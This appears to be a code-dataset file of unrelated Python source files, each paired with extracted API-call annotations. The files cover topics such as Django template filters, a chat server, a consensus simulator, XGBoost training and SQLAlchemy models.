signal='SIGUSR1')\n", (22527, 22572), False, 'from backend import celery_app, settings\n'), ((24299, 24376), 'backend_app.models.Dataset.objects.filter', 'models.Dataset.objects.filter', ([], {'id': 'weight.dataset_id_id', 'is_single_image': '(False)'}), '(id=weight.dataset_id_id, 
is_single_image=False)\n', (24328, 24376), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((24576, 24626), 'backend_app.models.Model.objects.filter', 'models.Model.objects.filter', ([], {'id': 'weight.model_id_id'}), '(id=weight.model_id_id)\n', (24603, 24626), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((24822, 24885), 'backend_app.models.Project.objects.filter', 'models.Project.objects.filter', ([], {'id': "serializer.data['project_id']"}), "(id=serializer.data['project_id'])\n", (24851, 24885), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((26273, 26310), 'os.path.join', 'opjoin', (['ckpts_dir', 'f"""{weight.id}.bin"""'], {}), "(ckpts_dir, f'{weight.id}.bin')\n", (26279, 26310), True, 'from os.path import join as opjoin\n'), ((27492, 27518), 'django.db.models.Q', 'Q', ([], {'name__icontains': 'name[0]'}), '(name__icontains=name[0])\n', (27493, 27518), False, 'from django.db.models import Q\n'), ((27521, 27547), 'django.db.models.Q', 'Q', ([], {'name__icontains': 'name[1]'}), '(name__icontains=name[1])\n', (27522, 27547), False, 'from django.db.models import Q\n'), ((25659, 25682), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (25680, 25682), False, 'import datetime\n'), ((25857, 25919), 'backend_app.models.ModelWeights.objects.filter', 'models.ModelWeights.objects.filter', ([], {'id': 'weight.pretrained_on_id'}), '(id=weight.pretrained_on_id)\n', (25891, 25919), False, 'from backend_app import mixins as BAMixins, models, serializers, swagger\n'), ((26412, 26424), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (26422, 26424), False, 'import uuid\n')] |
# Exercise 1: print the multiplication table of a number, one multiple per line.
number_to_multiply = int(input("Input number to multiply: ")) # Do not change this line
how_often = int(input("Input how often to multiply: ")) # Do not change this line
# Step by the number itself so each value is the next multiple.
for i in range(number_to_multiply, (how_often * number_to_multiply) + 1, number_to_multiply):
    print(i)
# Exercise 2: dog-age to human-age conversion.
# (Translated from Icelandic:) the first year is 15, the second 9, and every
# year after that corresponds to 4 each.
dog_age = int(input("Input dog's age: ")) # Do not change this line
human_age = 0
if dog_age <= 0 or dog_age > 16:
    print("Invalid age")
# The while/break pair behaves like a single `if 0 < dog_age <= 16:` guard.
while dog_age > 0 and dog_age <= 16:
    if dog_age == 1:
        human_age = 15
    elif dog_age == 2:
        human_age = 24
    elif dog_age > 2:
        # 24 human years after year two, plus 4 per additional dog year.
        human_age = 28 + 4*(dog_age - 3)
    print("Human age:", human_age)
    break
# Exercise 3: repeatedly take square roots (rounded to 4 decimals) until the
# value drops below 2.
import math
start_int = int(input("Input starting integer: "))
while start_int >= 2:
    result = round(math.sqrt(start_int), 4)
    start_int = result
    print(result)
# Exercise 4: print a number triangle (row i contains 1..i).
max_int = int(input("Input max integer: "))
for i in range(0, max_int + 1):
    for j in range(1, i + 1):
        print(j, end=" ")
    print()
| [
"math.sqrt"
] | [((824, 844), 'math.sqrt', 'math.sqrt', (['start_int'], {}), '(start_int)\n', (833, 844), False, 'import math\n')] |
import re

# Pre-compiled patterns, applied in order by sanitize_text().
url_removal = re.compile(r'https?://\S*')
rt_user_removal = re.compile(r'(RT )?(@\S+)?')
spaces_removal = re.compile(r'\s+')


def sanitize_text(tweet_text):
    """Strip retweet markers, @mentions and URLs, then collapse whitespace.

    The order matters: mentions/"RT " prefixes go first, then URLs, and
    finally runs of whitespace are squeezed to single spaces and the
    result is stripped.
    """
    without_mentions = rt_user_removal.sub('', tweet_text)
    without_urls = url_removal.sub('', without_mentions)
    return spaces_removal.sub(' ', without_urls).strip()


def preprocess_text(text):
    """Public preprocessing entry point; currently just sanitizes."""
    return sanitize_text(text)
| [
"re.compile"
] | [((25, 52), 're.compile', 're.compile', (['"""https?://\\\\S*"""'], {}), "('https?://\\\\S*')\n", (35, 52), False, 'import re\n'), ((71, 99), 're.compile', 're.compile', (['"""(RT )?(@\\\\S+)?"""'], {}), "('(RT )?(@\\\\S+)?')\n", (81, 99), False, 'import re\n'), ((117, 135), 're.compile', 're.compile', (['"""\\\\s+"""'], {}), "('\\\\s+')\n", (127, 135), False, 'import re\n')] |
from recipes.models import Purchases
# NOTE(review): this imported `register` is immediately shadowed by the
# Library() below; the import looks removable — confirm nothing relies on it.
from django.template.defaulttags import register
from django import template

register = template.Library()  # noqa


@register.filter
def check_subscription(author_id, user):
    """Return True if `user` follows the author with id `author_id`."""
    return user.follower.filter(author=author_id).exists()


@register.filter
def check_favorite(recipe_id, user):
    """Return True if `user` has favorited the recipe with id `recipe_id`."""
    return user.favorites.filter(following_recipe=recipe_id).exists()


@register.filter
def check_purchase(request, recipe):
    """Tell whether `recipe` is in the user's shopping list.

    Authenticated users are checked against the Purchases table (returns a
    queryset, truthy when non-empty); anonymous users are checked against
    the 'purchase' entry of their session, which stores recipe ids as
    strings.
    """
    if request.user.is_authenticated:
        return Purchases.objects.filter(user=request.user, recipe=recipe)
    else:
        session_purchase = request.session.get('purchase', default=None)
        if session_purchase is not None:
            return str(recipe.id) in session_purchase
        else:
            return False


@register.filter
def purchases_count(request):
    """Return the number of items in the user's shopping list (0 if none)."""
    if request.user.is_authenticated:
        return Purchases.objects.filter(user=request.user).count()
    else:
        try:
            return len(request.session['purchase'])
        except KeyError:
            # Anonymous user with no 'purchase' key in the session yet.
            return 0
"recipes.models.Purchases.objects.filter",
"django.template.Library"
] | [((126, 144), 'django.template.Library', 'template.Library', ([], {}), '()\n', (142, 144), False, 'from django import template\n'), ((506, 564), 'recipes.models.Purchases.objects.filter', 'Purchases.objects.filter', ([], {'user': 'request.user', 'recipe': 'recipe'}), '(user=request.user, recipe=recipe)\n', (530, 564), False, 'from recipes.models import Purchases\n'), ((884, 927), 'recipes.models.Purchases.objects.filter', 'Purchases.objects.filter', ([], {'user': 'request.user'}), '(user=request.user)\n', (908, 927), False, 'from recipes.models import Purchases\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Simple select()-based chat server driven from stdin.
# NOTE(review): this is Python 2 code (`Queue` module, `raw_input`) — it will
# not run unmodified on Python 3.
import sys
import socket as sckt
import select as slct
import Queue
import defaults
import server_manager

# Listening socket; SO_REUSEADDR lets the server restart without waiting for
# TIME_WAIT sockets to expire.
socket = sckt.socket(sckt.AF_INET, sckt.SOCK_STREAM)
socket.setsockopt(sckt.SOL_SOCKET, sckt.SO_REUSEADDR, 1)
socket.bind((sckt.gethostname(), defaults.PORT))
# socket.bind(('', defaults.PORT))
socket.listen(5)
running = True
manager = server_manager.management()
# Main event loop: multiplex the listening socket, stdin commands, and all
# client sockets tracked by the manager. Timeout 0 makes select non-blocking.
while running:
    read, write, exceptions = slct.select([socket, sys.stdin] + manager.inputs, manager.outputs, [], 0)
    for client in read:
        if client == socket:
            # New incoming connection on the listening socket.
            manager.reg_client(client)
        elif client == sys.stdin:
            # Operator command; only "/exit" is recognized.
            msg = raw_input()
            if msg[:1] == '/':
                msg = msg[1:].split()
                if msg[0] == 'exit':
                    manager.shutdown()
                    running = False
                    sys.stdout.write('Exiting\n')
        else:
            # Data from an already-connected client.
            manager.receive(client)
    # Flush one queued message per writable client; drop the client from the
    # output set once its queue is empty.
    for client in write:
        try:
            msg = manager.clients[client].queue.get_nowait()
        except Queue.Empty:
            manager.outputs.remove(client)
        else:
            manager.clients[client].send(msg)
    for exc in exceptions:
        print(exc)
socket.close()
| [
"select.select",
"socket.socket",
"server_manager.management",
"socket.gethostname",
"sys.stdout.write"
] | [((165, 208), 'socket.socket', 'sckt.socket', (['sckt.AF_INET', 'sckt.SOCK_STREAM'], {}), '(sckt.AF_INET, sckt.SOCK_STREAM)\n', (176, 208), True, 'import socket as sckt\n'), ((393, 420), 'server_manager.management', 'server_manager.management', ([], {}), '()\n', (418, 420), False, 'import server_manager\n'), ((463, 536), 'select.select', 'slct.select', (['([socket, sys.stdin] + manager.inputs)', 'manager.outputs', '[]', '(0)'], {}), '([socket, sys.stdin] + manager.inputs, manager.outputs, [], 0)\n', (474, 536), True, 'import select as slct\n'), ((279, 297), 'socket.gethostname', 'sckt.gethostname', ([], {}), '()\n', (295, 297), True, 'import socket as sckt\n'), ((784, 813), 'sys.stdout.write', 'sys.stdout.write', (['"""Exiting\n"""'], {}), "('Exiting\\n')\n", (800, 813), False, 'import sys\n')] |
from scraper import TwitterScraper, ICanHazDadJokeScraper

# All scrapers to run, in order.
scrapers = [
    TwitterScraper('baddadjokes'),
    ICanHazDadJokeScraper()
]

if __name__ == '__main__':
    # Note: the loop variable shadows the imported `scraper` module name;
    # harmless here since the module is not used after the imports above.
    for scraper in scrapers:
        scraper.scrape()
| [
"scraper.ICanHazDadJokeScraper",
"scraper.TwitterScraper"
] | [((76, 105), 'scraper.TwitterScraper', 'TwitterScraper', (['"""baddadjokes"""'], {}), "('baddadjokes')\n", (90, 105), False, 'from scraper import TwitterScraper, ICanHazDadJokeScraper\n'), ((111, 134), 'scraper.ICanHazDadJokeScraper', 'ICanHazDadJokeScraper', ([], {}), '()\n', (132, 134), False, 'from scraper import TwitterScraper, ICanHazDadJokeScraper\n')] |
import os


def prepend_include(root=".", header='#include "stdafx.h"\n\n'):
    """Prepend *header* to every ``.cpp`` file under *root*, recursively.

    Improvements over the original one-shot script:
    - the search root and header are parameters instead of hard-coded values;
    - files that already start with the header are skipped, so running the
      script twice no longer duplicates the include (idempotent);
    - the work only happens when run as a script, not on import.

    Returns the list of file paths that were modified.
    """
    cpp_files = [
        os.path.join(dirpath, name)
        for dirpath, _dirnames, filenames in os.walk(root)
        for name in filenames
        if os.path.splitext(name)[1] == '.cpp'
    ]
    changed = []
    for path in cpp_files:
        with open(path, "r") as f:
            data = f.read()
        if data.startswith(header):
            continue  # already patched
        with open(path, "w") as f:
            f.write(header + data)
        changed.append(path)
    return changed


if __name__ == "__main__":
    prepend_include()
| [
"os.path.splitext",
"os.path.join",
"os.walk"
] | [((23, 42), 'os.path.join', 'os.path.join', (['dp', 'f'], {}), '(dp, f)\n', (35, 42), False, 'import os\n'), ((68, 80), 'os.walk', 'os.walk', (['"""."""'], {}), "('.')\n", (75, 80), False, 'import os\n'), ((103, 122), 'os.path.splitext', 'os.path.splitext', (['f'], {}), '(f)\n', (119, 122), False, 'import os\n')] |
# SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2021 Micron Technology, Inc. All rights reserved.
from typing import List
from tools import config
from tools.base import BaseTest
from tools.helpers import shlex_join
class KmtTest(BaseTest):
    """Wrapper that runs the `kmt` benchmark tool and post-processes its output
    into the structured report dict provided by BaseTest."""

    def __init__(self, name: str, args: List[str]):
        super().__init__(name, "kmt")
        self.args = self.__fix_args(args)
        self.kmt_out_path = None  # set by execute(); path to kmt's stdout capture
        self.report["kmt"] = {
            "args": self.args,
            "cmdline": shlex_join(self.args),
        }

    @staticmethod
    def __fix_args(args: List):
        """Build the full kmt command line: prepend the binary name, add the
        -L (latency) and -s1 flags if the caller did not supply them, and
        append the KVDB home and KVS name from the test config."""
        new_args = ["kmt"] + list(args)
        if not any([arg.startswith("-L") for arg in args]):
            new_args.append("-L")
        if not any([arg.startswith("-s") for arg in args]):
            new_args.append("-s1")
        new_args.append(config.KVDB_HOME)
        new_args.append(config.KVS_NAME)
        return new_args

    def execute(self):
        """Run kmt, parse its output into the report, and persist the report."""
        super()._execute_init()
        completed_info = super()._run_command(self.args)
        self.kmt_out_path = completed_info.out_path
        self._postprocess()
        self._print_and_save_summary()
        super()._save_report()

    def _postprocess(self):
        """Parse kmt's output file into init/test phase dicts.

        Recognized line prefixes:
        - "iclose":   init-phase summary (put throughput, run time)
        - "tclose":   test-phase summary (put/get throughput, run time)
        - "slatency": per-phase, per-op latency percentiles
        NOTE(review): "slatency" handling assumes the matching iclose/tclose
        line appeared earlier in the file (it references the operation dicts
        created there) — confirm kmt always emits them in that order.
        """
        init_phase = {
            "name": "init",
            "operations": [],
        }
        test_phase = {
            "name": "test",
            "operations": [],
        }
        with open(self.kmt_out_path) as fd:
            for line in fd:
                if line.startswith("iclose"):
                    record = line.split()
                    total_puts = int(record[6])
                    run_time_ms = int(record[15])
                    puts_per_second = int(total_puts / (run_time_ms / 1000.0))
                    init_phase["run_time_ms"] = run_time_ms
                    init_put_operation = {
                        "name": "put",
                        "throughput": puts_per_second,
                    }
                    init_phase["operations"].append(init_put_operation)
                elif line.startswith("tclose"):
                    record = line.split()
                    total_gets, total_puts = int(record[5]), int(record[6])
                    run_time_ms = int(record[15])
                    puts_per_second = int(total_puts / (run_time_ms / 1000.0))
                    gets_per_second = int(total_gets / (run_time_ms / 1000.0))
                    test_phase["run_time_ms"] = run_time_ms
                    test_put_operation = {
                        "name": "put",
                        "throughput": puts_per_second,
                    }
                    test_get_operation = {
                        "name": "get",
                        "throughput": gets_per_second,
                    }
                    test_phase["operations"].extend(
                        [test_put_operation, test_get_operation]
                    )
                elif line.startswith("slatency"):
                    record = line.split()
                    phase = record[1]
                    op = record[2]
                    # Fields 5..12 are latencies in microseconds.
                    (
                        lat_min,
                        lat_max,
                        lat_avg,
                        lat_p90,
                        lat_p95,
                        lat_p99,
                        lat_p99_9,
                        lat_p99_99,
                    ) = [int(x) for x in record[5:13]]
                    if phase == "init":
                        assert op == "put"
                        operation_dict = init_put_operation
                    elif phase == "test":
                        assert op in ["get", "put"]
                        if op == "put":
                            operation_dict = test_put_operation
                        elif op == "get":
                            operation_dict = test_get_operation
                        else:
                            assert False
                    else:
                        assert False
                    operation_dict["latency_us"] = {
                        "avg": lat_avg,
                        "max": lat_max,
                        "min": lat_min,
                        "percentiles": [
                            [90, lat_p90],
                            [95, lat_p95],
                            [99, lat_p99],
                            [99.9, lat_p99_9],
                            [99.99, lat_p99_99],
                        ],
                    }
        self.report["phases"] = [
            init_phase,
            test_phase,
        ]
| [
"tools.helpers.shlex_join"
] | [((504, 525), 'tools.helpers.shlex_join', 'shlex_join', (['self.args'], {}), '(self.args)\n', (514, 525), False, 'from tools.helpers import shlex_join\n')] |
# Copyright (c) 2018 IoTeX
# This is an alpha (internal) release and is not suitable for production. This source code is provided 'as is' and no
# warranties are given as to title or non-infringement, merchantability or fitness for purpose and, to the extent
# permitted by law, all liability for your use of the code is disclaimed. This source code is governed by Apache
# License 2.0 that can be found in the LICENSE file.
"""This module defines the Player class, which represents a player in the network and contains functionality to make transactions, propose blocks, and validate blocks.
"""
import random
import grpc
import numpy as np
from proto import simulator_pb2_grpc
from proto import simulator_pb2
import solver
import consensus_client
import consensus_failurestop
# enum for defining the consensus types
class CTypes:
    """Consensus behaviour constants for a Player.

    Deliberately plain integer class attributes (not an ``enum.Enum``) so
    the values compare equal to the raw ints used elsewhere.
    """

    Honest, FailureStop, ByzantineFault = 0, 1, 2
class Player:
    """A node in the simulated network.

    Queues inbound messages, forwards them to its consensus engine at each
    heartbeat, and gossips the engine's responses to connected players.
    """
    id = 0  # player id (class-level counter; each instance takes the current value)
    MEAN_TX_FEE = 0.2  # mean transaction fee
    STD_TX_FEE = 0.05  # std of transaction fee
    DUMMY_MSG_TYPE = 1999  # if there are no messages to process, dummy message is sent to consensus engine
    msgMap = {(DUMMY_MSG_TYPE, bytes()): "dummy msg"}  # maps message to message name for printing
    correctHashes = []  # hashes of blocks proposed by HONEST consensus types
    # NOTE(review): NORMAL_MEAN / NORMAL_STD are used in sendOutbound() but not
    # defined in this class — presumably assigned externally; confirm.

    def __init__(self, consensusType):
        """Creates a new Player object"""
        self.id = Player.id  # the player's id
        Player.id += 1
        self.blockchain = []  # blockchain (simplified to a list)
        self.connections = []  # list of connected players
        self.inbound = []  # inbound messages from other players in the network at heartbeat r
        self.outbound = []  # outbound messages to other players in the network at heartbeat r
        self.seenMessages = set()  # set of seen messages
        # ByzantineFault players reuse the honest engine; the byzantine
        # behaviour is applied later (see the proposal branch in action()).
        if consensusType == CTypes.Honest or consensusType == CTypes.ByzantineFault:
            self.consensus = consensus_client.Consensus()
        elif consensusType == CTypes.FailureStop:
            self.consensus = consensus_failurestop.ConsensusFS()
        self.consensusType = consensusType
        self.consensus.playerID = self.id
        self.consensus.player = self
        self.nMsgsPassed = [0]  # per-block message counters (last entry is the in-progress block)
        self.timeCreated = []  # commit timestamp of each block in self.blockchain

    def action(self, heartbeat):
        """Executes the player's actions for heartbeat r"""
        print("player %d action started at heartbeat %f" % (self.id, heartbeat))
        # self.inbound: [sender, (msgType, msgBody), timestamp]
        # print messages
        for sender, msg, timestamp in self.inbound:
            print("received %s from %s with timestamp %f" % (Player.msgMap[msg], sender, timestamp))
        # if the Player received no messages before the current heartbeat, add a `dummy` message so the Player still pings the consensus in case the consensus has something it wants to return
        # an example of when this is useful is in the first round when consensus proposes a message; the Player needs to ping it to receive the proposal
        if len(list(filter(lambda x: x[2] <= heartbeat, self.inbound))) == 0:
            self.inbound += [[-1, (Player.DUMMY_MSG_TYPE, bytes()), heartbeat]]
        # process each inbound message
        for sender, msg, timestamp in self.inbound:
            # note: msg is a tuple: (msgType, msgBody)
            # cannot see the message yet if the heartbeat is less than the timestamp
            if timestamp > heartbeat: continue
            if msg[0] != Player.DUMMY_MSG_TYPE and (msg, sender) in self.seenMessages: continue
            self.seenMessages.add((msg, sender))
            print("sent %s to consensus engine" % Player.msgMap[msg])
            received = self.consensus.processMessage(sender, msg)
            for recipient, mt, v in received:
                # if mt = 2, the msgBody is comprised of message|blockHash
                # recipient is the recipient of the message the consensus sends outwards
                # mt is the message type (0 = view state change message, 1 = block committed, 2 = special case)
                # v is message value
                # TODO: fix this
                '''if "|" in v[1]:
                    separator = v[1].index("|")
                    blockHash = v[1][separator+1:]
                    v = (v[0], v[1][:separator])'''
                if v not in Player.msgMap:
                    Player.msgMap[v] = "msg "+str(len(Player.msgMap))
                print("received %s from consensus engine" % Player.msgMap[v])
                if mt == 0: # view state change message
                    self.outbound.append([recipient, v, timestamp])
                elif mt == 1: # block to be committed
                    self.blockchain.append(v[1]) # append block hash
                    self.nMsgsPassed.append(0)
                    self.timeCreated.append(timestamp)
                    print("committed %s to blockchain" % Player.msgMap[v])
                else: # newly proposed block
                    self.outbound.append([recipient, v, timestamp])
                    print("PROPOSED %s BLOCK"%("HONEST" if self.consensusType == CTypes.Honest else "BYZANTINE"))
                    if self.consensusType != CTypes.ByzantineFault:
                        # NOTE(review): blockHash is only assigned in the
                        # commented-out parsing above, so this branch raises
                        # NameError as written — blocked on the TODO above.
                        Player.correctHashes.append(blockHash)
                    else:
                        Player.correctHashes.append("")
            # also gossip the current message
            # I think this is not necessary for tendermint so I am commenting it out
            '''if msg[0] != Player.DUMMY_MSG_TYPE and self.consensusType != CTypes.FailureStop:
                self.outbound.append([msg, timestamp])'''
        self.inbound = list(filter(lambda x: x[2] > heartbeat, self.inbound)) # get rid of processed messages
        return self.sendOutbound()

    def sendOutbound(self):
        """Deliver all queued outbound messages to connected players.

        Each delivery gets a log-normally distributed propagation delay added
        to its timestamp. Returns (recipients, sentMsgs) where recipients is
        the list of Player objects messages were sent to and sentMsgs is True
        iff there was anything to send.
        """
        if len(self.outbound) == 0:
            sentMsgs = False
        else:
            sentMsgs = True
        ci = set()
        for recipient, message, timestamp in self.outbound:
            if recipient == -1: # -1 means message is broadcast to all connections
                for c in self.connections:
                    self.outbound.append([c.id, message, timestamp])
                continue
            recipient = list(filter(lambda x: x.id == recipient, self.connections))[0] # recipient is an id; we want to find the player which corresponds to this id in the connections
            ci.add(recipient)
            sender = self.id
            self.nMsgsPassed[-1] += 1
            dt = np.random.lognormal(self.NORMAL_MEAN, self.NORMAL_STD) # add propagation time to timestamp
            print("sent %s to %s" % (Player.msgMap[message], recipient.id))
            recipient.inbound.append([sender, message, timestamp+dt])
        self.outbound.clear()
        print()
        return list(ci), sentMsgs

    def __str__(self):
        return "player %s" % (self.id)

    def __repr__(self):
        return "player %s" % (self.id)

    def __hash__(self):
        return self.id
| [
"consensus_failurestop.ConsensusFS",
"consensus_client.Consensus",
"numpy.random.lognormal"
] | [((2124, 2152), 'consensus_client.Consensus', 'consensus_client.Consensus', ([], {}), '()\n', (2150, 2152), False, 'import consensus_client\n'), ((6945, 6999), 'numpy.random.lognormal', 'np.random.lognormal', (['self.NORMAL_MEAN', 'self.NORMAL_STD'], {}), '(self.NORMAL_MEAN, self.NORMAL_STD)\n', (6964, 6999), True, 'import numpy as np\n'), ((2232, 2267), 'consensus_failurestop.ConsensusFS', 'consensus_failurestop.ConsensusFS', ([], {}), '()\n', (2265, 2267), False, 'import consensus_failurestop\n')] |
import argparse
from FVC_utils import load_from_pickle, save_to_pickle, readData, printx, time, path
from xgboost import XGBClassifier
import warnings
warnings.filterwarnings('ignore')
# from sklearn.preprocessing import StandardScaler


def training_series(X_train, y_train, normalizer=None, xgb_params={}):
    """Fit an XGBoost classifier on the training set.

    If `normalizer` is given it is fit on X_train and used to transform it.
    Returns ([{'FVC': fitted_classifier}], normalizer).
    NOTE(review): `xgb_params={}` is a mutable default argument — not mutated
    here, but worth replacing with None as a precaution.
    """
    printx('########### training FVC model ... ############')
    printx('training set shape: {}'.format(X_train.shape))
    if normalizer:
        X_train = normalizer.fit_transform(X_train)
    t0 = time.time()
    clf = XGBClassifier(**xgb_params)
    printx(clf.get_params())
    clf.fit(X_train, y_train)
    # printx('model parameters: \n{}'.format(clf.get_params()))
    clfkit = {'FVC':clf}
    printx('use {:.0f} s\n'.format(time.time()-t0))
    return [clfkit], normalizer


# ---- command-line interface ------------------------------------------------
parser = argparse.ArgumentParser(
    description='extract the complex region' )
parser.add_argument(
    '--in_tp', type=str,
    default="training_tp_tensor.record",
    help="wait to describe")
parser.add_argument(
    '--in_fp', type=str,
    default="training_fp_tensor.record",
    help="wait to describe")
parser.add_argument(
    '--model', type=str,
    default="no",
    help="the absolute path of pretrained model, default no pretrained model.")
parser.add_argument(
    '--out_model', type=str,
    default="retrain.model",
    help="wait to describe")
parser.add_argument(
    '--random_seed', type=int,
    default=0,
    help="random state, default 0")
parser.add_argument(
    '--scale_strategy', type=str,
    default='standard', choices=['standard', 'no'],
    help='set normalization strategy, default standard scale. \nIf set no, oringal features will be used. \nIf --model is not no, the parameter will be ignored.')
args = parser.parse_args()

train_TP_file = args.in_tp
train_FP_file = args.in_fp
premodel_file = args.model
out_model = args.out_model
random_seed = args.random_seed
scale_strategy = args.scale_strategy

xgb_params = {
    'n_estimators':200,
    'n_jobs':-1,
    'random_state':random_seed,
    # 'tree_method':'approx'
}

# Either resume from a pre-trained model (reusing its normalizer), or start
# fresh with an optional StandardScaler depending on --scale_strategy.
if premodel_file != 'no':
    printx("loading the pre-trained model: {} ...".format(premodel_file))
    premodel, normalizer = load_from_pickle(premodel_file, '../pretrain')
    xgb_params['xgbdef'] = list(premodel[0].values())[0]
elif premodel_file == 'no' and scale_strategy == 'standard':
    printx("standardly scale all features ...")
    from sklearn.preprocessing import StandardScaler
    normalizer = StandardScaler()
else:
    normalizer = None

printx('load files, {} and {}'.format(train_TP_file, train_FP_file))
X_train, y_train = readData(train_TP_file, train_FP_file)

outmodel, normalizer = save_to_pickle(training_series(X_train, y_train, normalizer=normalizer, xgb_params=xgb_params),
                                      out_model)
| [
"FVC_utils.load_from_pickle",
"FVC_utils.printx",
"FVC_utils.readData",
"argparse.ArgumentParser",
"FVC_utils.time.time",
"sklearn.preprocessing.StandardScaler",
"warnings.filterwarnings",
"xgboost.XGBClassifier"
] | [((151, 184), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (174, 184), False, 'import warnings\n'), ((802, 867), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""extract the complex region"""'}), "(description='extract the complex region')\n", (825, 867), False, 'import argparse\n'), ((2616, 2654), 'FVC_utils.readData', 'readData', (['train_TP_file', 'train_FP_file'], {}), '(train_TP_file, train_FP_file)\n', (2624, 2654), False, 'from FVC_utils import load_from_pickle, save_to_pickle, readData, printx, time, path\n'), ((312, 369), 'FVC_utils.printx', 'printx', (['"""########### training FVC model ... ############"""'], {}), "('########### training FVC model ... ############')\n", (318, 369), False, 'from FVC_utils import load_from_pickle, save_to_pickle, readData, printx, time, path\n'), ((509, 520), 'FVC_utils.time.time', 'time.time', ([], {}), '()\n', (518, 520), False, 'from FVC_utils import load_from_pickle, save_to_pickle, readData, printx, time, path\n'), ((531, 558), 'xgboost.XGBClassifier', 'XGBClassifier', ([], {}), '(**xgb_params)\n', (544, 558), False, 'from xgboost import XGBClassifier\n'), ((2199, 2245), 'FVC_utils.load_from_pickle', 'load_from_pickle', (['premodel_file', '"""../pretrain"""'], {}), "(premodel_file, '../pretrain')\n", (2215, 2245), False, 'from FVC_utils import load_from_pickle, save_to_pickle, readData, printx, time, path\n'), ((2368, 2411), 'FVC_utils.printx', 'printx', (['"""standardly scale all features ..."""'], {}), "('standardly scale all features ...')\n", (2374, 2411), False, 'from FVC_utils import load_from_pickle, save_to_pickle, readData, printx, time, path\n'), ((2482, 2498), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (2496, 2498), False, 'from sklearn.preprocessing import StandardScaler\n'), ((742, 753), 'FVC_utils.time.time', 'time.time', ([], {}), '()\n', (751, 753), False, 'from FVC_utils import 
load_from_pickle, save_to_pickle, readData, printx, time, path\n')] |
import subprocess

from masonite.helpers import config


def has_unmigrated_migrations():
    """Return True if any known migration directory has pending migrations.

    Only runs in debug mode and only when a database connection can be
    established; otherwise returns False. Uses `orator migrate:status` and
    looks for a 'No' (i.e. "not migrated") marker in its output.
    """
    if not config('application.debug'):
        return False

    # Imported lazily so the app container / DB config are only touched when
    # the check actually runs.
    from wsgi import container
    from config.database import DB
    try:
        DB.connection()
    except Exception:
        # No usable database — nothing to report.
        return False

    # Collect the default migration directory plus any registered by
    # *MigrationDirectory providers in the container.
    migration_directory = ['databases/migrations']
    for key, value in container.providers.items():
        if type(key) == str and 'MigrationDirectory' in key:
            migration_directory.append(value)

    for directory in migration_directory:
        try:
            output = bytes(subprocess.check_output(
                ['orator', 'migrate:status', '-c',
                 'config/database.py', '-p', directory]
            )).decode('utf-8')
            # NOTE(review): substring match on 'No' is fragile — it would
            # also match unrelated words in the command output; confirm the
            # exact orator output format.
            if 'No' in output:
                return True
        except Exception:
            # Best-effort: a failing status command is treated as "nothing
            # pending" for that directory rather than aborting the check.
            pass

    return False
| [
"subprocess.check_output",
"wsgi.container.providers.items",
"masonite.helpers.config",
"config.database.DB.connection"
] | [((367, 394), 'wsgi.container.providers.items', 'container.providers.items', ([], {}), '()\n', (392, 394), False, 'from wsgi import container\n'), ((100, 127), 'masonite.helpers.config', 'config', (['"""application.debug"""'], {}), "('application.debug')\n", (106, 127), False, 'from masonite.helpers import config\n'), ((234, 249), 'config.database.DB.connection', 'DB.connection', ([], {}), '()\n', (247, 249), False, 'from config.database import DB\n'), ((586, 688), 'subprocess.check_output', 'subprocess.check_output', (["['orator', 'migrate:status', '-c', 'config/database.py', '-p', directory]"], {}), "(['orator', 'migrate:status', '-c',\n 'config/database.py', '-p', directory])\n", (609, 688), False, 'import subprocess\n')] |
from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine

Base = declarative_base()


class User(Base):
    """A registered user (owner of supermarkets and products)."""
    __tablename__ = 'user'

    id = Column(Integer, primary_key=True)
    name = Column(String(250), nullable=False)
    email = Column(String(250), nullable=False)
    password = Column(String(250))
    picture = Column(String(250))


class Supermarket(Base):
    """A supermarket, owned by a User."""
    __tablename__ = 'supermarket'

    id = Column(Integer, primary_key=True)
    name = Column(String(250), nullable=False)
    address = Column(String(250), nullable=False)
    picture = Column(String(250))
    user_id = Column(Integer, ForeignKey('user.id'))
    user = relationship(User)

    @property
    def serialize(self):
        """JSON-serializable representation (used by API endpoints)."""
        return {
            'id': self.id,
            'name': self.name,
            'address': self.address,
            'picture': self.picture,
        }


class Products(Base):
    """A product sold by a Supermarket, added by a User."""
    __tablename__ = 'products'

    id = Column(Integer, primary_key=True)
    name = Column(String(80), nullable=False)
    details = Column(String(250))
    price = Column(String(8))  # stored as text, not a numeric type
    picture = Column(String(250))
    supermarket_id = Column(Integer, ForeignKey('supermarket.id'))
    supermarket = relationship(Supermarket)
    user_id = Column(Integer, ForeignKey('user.id'))
    user = relationship(User)

    @property
    def serialize(self):
        """JSON-serializable representation (used by API endpoints)."""
        return {
            'id': self.id,
            'name': self.name,
            'details': self.details,
            'price': self.price,
            'picture': self.picture,
        }


# Creates the SQLite database file and all tables at import time.
engine = create_engine('sqlite:///supermarket.db')
Base.metadata.create_all(engine)
| [
"sqlalchemy.orm.relationship",
"sqlalchemy.create_engine",
"sqlalchemy.ForeignKey",
"sqlalchemy.String",
"sqlalchemy.ext.declarative.declarative_base",
"sqlalchemy.Column"
